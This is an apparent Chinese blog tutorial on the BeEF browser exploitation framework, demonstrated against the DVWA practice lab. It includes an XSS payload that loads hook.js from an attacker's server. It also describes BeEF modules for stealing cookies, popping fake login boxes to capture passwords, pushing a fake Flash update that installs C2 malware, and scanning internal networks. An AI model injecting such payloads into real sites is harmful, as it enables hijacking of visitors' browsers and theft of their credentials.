XSS之Beef神器

gclome

原文链接：XSS之Beef神器

0x01 前言

Beef 是目前最为流行的 web 框架攻击平台，专注于利用浏览器漏洞，它的全称是 The Browser Exploitation Framework。

Beef提供一个 web 界面供操作，只要访问了嵌入 hook.js 页面，亦或者加载了 hook.js 文件的浏览器，就会不断的以 GET 的方式将其自身的相关消息到 BeEF 的 server 端

0x02 利用

上线

往存在XSS漏洞的地方插入以下代码

1. <script src="http://192.168.168.237:3000/hook.js"></script>

复制代码

当然xss的payload要根据是否存在waf做相对应的绕过，核心就是加载该hook.js代码

例如：往dvwa靶场插入xss代码

那么在beef上可以看到浏览器已经上线

可以选择各种工具模块

每个模块前面的颜色代表着不同的意义

尝试往被控浏览器弹框

获取cookie

重定向

被控浏览器跳转到百度

社工弹窗

弹出一个登录框，用户输入密码点击登录之后，beef可以获取到密码

持久化

目标无论点击哪里，都无法跳转到该系统到其他页面

社会工程学攻击

在社工这一栏，可以选择flash更新这类功能来诱使用户升级Flash，当用户点击之后，会下载我们的恶意文件执行，这样我们就可以用c2控制用户的系统.

内网扫描

Network用于收集内网信息，比如ping、端口扫描